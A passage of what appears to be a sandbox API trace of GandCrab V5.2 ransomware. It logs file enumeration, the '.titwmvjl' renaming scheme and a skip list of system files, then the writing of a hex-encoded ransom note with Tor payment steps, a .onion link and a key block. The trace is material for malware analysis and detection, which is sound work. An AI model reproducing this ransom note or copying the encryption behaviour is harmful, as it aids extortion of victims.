lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.263] lstrcmpW (lpString1="Window Switcher.lnk", lpString2=".") returned 1 [0072.263] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="..") returned 1 [0072.263] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="Window Switcher.lnk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" [0072.263] lstrlenW (lpString=".titwmvjl") returned 9 [0072.263] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 98 [0072.263] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.264] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.titwmvjl") returned 107 [0072.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 98 [0072.264] lstrlenW (lpString=".lnk") returned 4 [0072.264] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.264] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lnk ") returned 5 [0072.264] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.264] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.264] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0072.264] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0072.265] CloseHandle (hObject=0x2c4) returned 1 [0072.265] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.266] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.266] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.266] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt" [0072.266] lstrlenW (lpString=".titwmvjl") returned 9 [0072.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt") returned 86 [0072.266] VirtualAlloc (lpAddress=0x0, dwSize=0xec, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.266] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 95 [0072.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt") returned 86 [0072.266] lstrlenW (lpString=".txt") returned 4 [0072.266] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.266] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.266] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.266] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt") returned 86 [0072.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\TITWMVJL-DECRYPT.txt") returned 86 [0072.266] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.266] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.266] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.267] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.267] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.267] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.267] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.267] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.267] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.267] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.267] lstrcmpW (lpString1="UserData", lpString2=".") returned 1 [0072.267] lstrcmpW (lpString1="UserData", lpString2="..") returned 1 [0072.267] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2="UserData" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0072.267] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\" [0072.267] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.267] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.267] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.267] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.268] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.269] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.269] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\TITWMVJL-DECRYPT.txt") returned 96 [0072.269] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0072.270] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\